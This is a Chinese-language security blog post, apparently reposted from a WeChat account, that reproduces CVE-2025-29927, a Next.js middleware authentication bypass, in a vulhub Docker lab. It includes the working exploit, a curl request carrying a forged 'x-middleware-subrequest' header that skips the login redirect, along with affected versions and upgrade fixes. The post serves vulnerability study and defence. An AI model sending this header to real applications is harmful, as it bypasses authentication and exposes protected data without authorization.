漏洞复现篇 | Next.js 中间件鉴权绕过漏洞:CVE-2025-29927

admin 2025年3月27日20:08:58评论24 views字数 1338阅读4分27秒阅读模式
免责声明!

本公众号所分享内容仅用于网络安全技术讨论,切勿用于违法途径,所有渗透都需获取授权,违者后果自行承担,与本号及作者无关,请谨记守法

漏洞描述:

Next.js是由Vercel开发的基于React的现代Web应用框架,具备前后端一体的开发能力,广泛用于开发Server-side Rendering (SSR)和静态站点生成(SSG)项目。Next.js支持传统的Node.js模式和基于边缘计算(Edge Function)的运行模式,后者适用于轻量、高性能的服务逻辑。

该漏洞成因是框架中用于标记中间件递归请求的特殊请求头x-middleware-subrequest可被用户伪造,导致中间件处理链被绕过,进而影响基于中间件实现的身份认证、重定向等关键安全逻辑。由于使用该框架的应用较多,如AI应用chatbot-ui,建议受影响的用户根据实际情况评估风险,立即修复此漏洞。

影响范围:

目前受影响的NextJS版本:

11.1.4 < Next.js ≤ 13.5.614.0 < Next.js < 14.2.2515.0 < Next.js < 15.2.3

环境搭建:

使用vulhub即可,网址如下:
https://github.com/vulhub/vulhub/blob/master/next.js/CVE-2025-29927/README.zh-cn.md
1、更新apt:
apt-get update
2、安装docker:
apt install docker.io -y
漏洞复现篇 | Next.js 中间件鉴权绕过漏洞:CVE-2025-29927
3、查看docker是否安装成功:
docker -v
漏洞复现篇 | Next.js 中间件鉴权绕过漏洞:CVE-2025-29927
4、安装docker-compose:
apt install docker-compose -y
漏洞复现篇 | Next.js 中间件鉴权绕过漏洞:CVE-2025-29927
5、查看docker-compose是否安装成功:
docker-compose -v
漏洞复现篇 | Next.js 中间件鉴权绕过漏洞:CVE-2025-29927
6、下载Vulhub:
git clone https://github.com/vulhub/vulhub.git
7、启动环境:
cd vulhub-master/next.js/CVE-2025-29927
docker-compose up -d
漏洞复现篇 | Next.js 中间件鉴权绕过漏洞:CVE-2025-29927
8、查看环境:
docker ps -a
漏洞复现篇 | Next.js 中间件鉴权绕过漏洞:CVE-2025-29927
9、打开环境:
漏洞复现篇 | Next.js 中间件鉴权绕过漏洞:CVE-2025-29927
漏洞利用及复现过程:

在没有登录之前,正常访问根目录是这样的,会跳转到登录界面,

漏洞复现篇 | Next.js 中间件鉴权绕过漏洞:CVE-2025-29927
curl -i http://192.168.127.128:3000
漏洞复现篇 | Next.js 中间件鉴权绕过漏洞:CVE-2025-29927

添加header,

x-middleware-subrequestmiddleware:middleware:middleware:middleware:middleware

发现绕过了登录验证,直接跳转到了登录后的界面,

漏洞复现篇 | Next.js 中间件鉴权绕过漏洞:CVE-2025-29927
curl -i -H "x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware" http://192.168.127.128:3000
漏洞复现篇 | Next.js 中间件鉴权绕过漏洞:CVE-2025-29927
修复方案:

升级Next.js版本为:

    ≥15.2.315.x
    ≥14.2.25(14.x
参考:
https://forum.butian.net/article/679
漏洞复现篇 | Next.js 中间件鉴权绕过漏洞:CVE-2025-29927
 

 

原文始发于微信公众号(零日安全实验室):漏洞复现篇 | Next.js 中间件鉴权绕过漏洞:CVE-2025-29927,速看!!!

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年3月27日20:08:58
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   漏洞复现篇 | Next.js 中间件鉴权绕过漏洞:CVE-2025-29927https://cn-sec.com/archives/3891012.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息